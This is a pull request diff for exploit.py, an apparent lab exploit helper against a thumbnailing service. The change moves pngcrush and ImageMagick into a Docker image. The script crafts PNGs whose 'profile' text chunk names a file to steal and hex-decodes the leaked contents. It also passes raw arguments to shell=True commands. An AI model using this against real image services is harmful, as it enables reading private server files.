### PR TITLE
Move pngcrush execution to container

### DIFF
--- a/thumbnailer/Dockerfile.exploit
+++ b/thumbnailer/Dockerfile.exploit
@@ -1,0 +1,6 @@
+FROM node
+
+RUN apt-get update && \
+    apt-get install -y pngcrush && \
+    apt-get clean && \
+    rm -rf /var/lib/apt/lists/*

--- a/thumbnailer/exploit.py
+++ b/thumbnailer/exploit.py
@@ -5,6 +5,10 @@ import time
 import os
 import platform
 
+def build_exploit_image():
+    print("Building exploit image...")
+    execute_command("docker build -t exploit . -f Dockerfile.exploit")
+
 def execute_command(command):
     # print("Executing: "+command)
     process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
@@ -12,19 +16,13 @@ def execute_command(command):
     return stdout.decode()
 
 def decode_png(png_file = os.getcwd()+"/result.png"):
+    build_exploit_image()
+
     if png_file[0] != "/":
         png_file = os.getcwd()+"/"+png_file
 
     print("Decoding content from "+png_file+"...\n")
-    if not os.path.isfile("/usr/bin/identify"):
-        command = "docker run --rm -it -v "+png_file+":/result.png node identify -verbose /result.png"
-    else:
-        command = "identify -verbose "+png_file
-
-    if platform.system() == "Darwin":
-        delimiter = "\r"
-    else:
-        delimiter = ''
+    command = "docker run --rm -it -v "+png_file+":/result.png exploit identify -verbose /result.png"
 
     image_data = execute_command(command)
     lines = image_data.split("\n")
@@ -34,17 +32,23 @@ def decode_png(png_file = os.getcwd()+"/result.png"):
     decoded_str = bytes.fromhex(raw_data_str).decode("utf-8")
     return decoded_str
 
+
 if len(sys.argv) < 2:
     command = ""
 else:
     command = sys.argv[1]
 
 if command == "encode":
+    build_exploit_image()
+
     image = sys.argv[2]
     file2cat = sys.argv[3]
     encoded_image = "encoded-" + image
     print("Encoding " + file2cat +" into " + image +" as " + encoded_image + " ...")
-    execute_command("pngcrush -text a \"profile\" \"" + file2cat +"\" " + image +" " + encoded_image)
+    
+    command = "docker run --rm -it -v "+os.getcwd()+":/imagedir exploit pngcrush -text a \"profile\" \"" + file2cat +"\" /imagedir/" + image +" /imagedir/" + encoded_image
+
+    execute_command(command)
     print("File encoded as " + encoded_image)
 
 elif command == "decode":


### PR DESCRIPTION
Not everyone has or wants the image tools used in the exploit.py script installed on their workstation. Moving them into a Docker image and running that instead.